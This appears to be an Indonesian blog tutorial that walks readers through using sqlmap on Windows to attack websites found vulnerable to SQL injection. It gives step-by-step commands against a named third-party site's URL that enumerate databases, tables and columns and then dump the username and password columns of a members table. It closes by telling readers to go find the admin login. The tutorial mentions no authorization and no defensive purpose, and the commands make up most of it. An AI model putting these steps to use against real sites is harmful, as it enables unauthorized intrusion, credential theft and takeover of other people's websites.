Tuturial sqlamp secara lengkap di windows, bagi sobat yang menemukan bug pada website dan ingin scan database website itu anda bisa menggunakan tools SQLMAP di windows
Phyton : download disini
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
Spoiler :
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmapsehingga tampak seperti gambar berikut ini
Spoiler :
Contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbslalu Tekan Enter
Spoiler :
8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah sqlmap.py -u Url Target - D nama database --tables
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables
Maka hasil nya akan seperti ini
Spoiler :
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table Members aja
dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini
Spoiler :
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut
Spoiler :
tinggal kita cari login admin nya
sekian dlo tutor dari ane mudah"an bermanfaat y Gan
terimakasih sudah share gan, manteb sekali
BalasHapushttps://www.tokopedia.com/mmionline/etalase/blower-solder-uap